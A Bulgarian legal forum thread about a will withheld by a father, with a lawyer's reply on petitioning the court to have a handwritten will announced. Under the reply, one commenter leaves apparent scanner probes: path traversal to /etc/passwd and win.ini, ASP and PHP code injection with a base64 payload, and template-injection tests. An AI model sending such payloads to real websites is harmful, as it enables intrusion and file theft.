Давност има това завещание

15.05.2010г. 09:17:06
Здравейте, имам вапрос! Баба ми почина през 2005 година и преди да почине каза, че е написала завещание и ни каза на мен и на сестра ми, че ни е оставила по нещо. Питахме баща ни(а той е неин син) за завещанието, кога ще го отваряме, а той ни каза, че нямя да го отваря в момента, продава една от нивите. И ни каза, че ако настояваме за завещанието, нищо няма да получиме сестра ми. Тя се отказа но аз не, искам да знам как мога да разбера дали ни има в завещанието, без баща ми да разбере това и каква давност има това завещание. Предварително ви благодаря

Правни мнения, съвети и коментари

12.07.2017г. 07:15
Здравейте, не уточнявате дали се касае за саморъчно завещание (изписано ръкописно от баба Ви) или нотариално. Ако се касае за саморъчно завещание, с което разполага баща Ви, е било необходимо веднага след смъртта на баба Ви, да иска обявяването му при нотариус. Възможно е Вие да подадете молба до районния съд по по мястото, където е открито наследството, за да определи срок за представяне на завещанието, с цел да бъде то обявено от нотариуса. Поздрави, адв. Николина Митова София, тел. 0898 303092
lxbfYeaa
05.10.2023г. 07:22
response.write(9502790*9057535)
lxbfYeaa
05.10.2023г. 07:22
'+response.write(9502790*9057535)+'
lxbfYeaa
05.10.2023г. 07:22
"+response.write(9502790*9057535)+"
lxbfYeaa
05.10.2023г. 07:22
lxbfYeaa
05.10.2023г. 07:22
../../../../../../../../../../../../../../etc/passwd
lxbfYeaa
05.10.2023г. 07:22
../../../../../../../../../../../../../../windows/win.ini
lxbfYeaa
05.10.2023г. 07:22
file:///etc/passwd
lxbfYeaa
05.10.2023г. 07:22
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
lxbfYeaa
05.10.2023г. 07:22
${9999955+10000325}

Коментар